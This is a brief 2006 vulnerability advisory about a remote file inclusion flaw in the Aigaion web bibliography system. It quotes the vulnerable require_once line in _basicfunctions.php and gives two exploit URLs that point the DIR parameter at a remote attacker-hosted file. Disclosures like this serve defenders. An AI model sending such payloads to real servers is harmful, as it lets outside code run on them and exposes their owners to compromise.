Aigaion Web Interface remote file inclusion

2006-11-14T00:00:00
ID SECURITYVULNS:DOC:15027
Type securityvulns
Reporter Securityvulns
Modified 2006-11-14T00:00:00

Description

Software:Web based bibliography management system Download link: http://sourceforge.net/projects/aigaion/ script:_basicfunctions.php author: navairum


The script _basicfunctions.php does not specify a value for the $DIR variable before including it. Vulnerable code:

//if this script is not called from within one of the base pages, redirect to frontpage require_once($DIR."checkBase.php");

/ This function leads the browser to the given location /


Exploit: http://site/[PATH]/_basicfunctions.php?DIR=http://site/uhoh.txt? http://site/path/pageactionauthor.php?DIR=http://site/uhoh.txt?


peace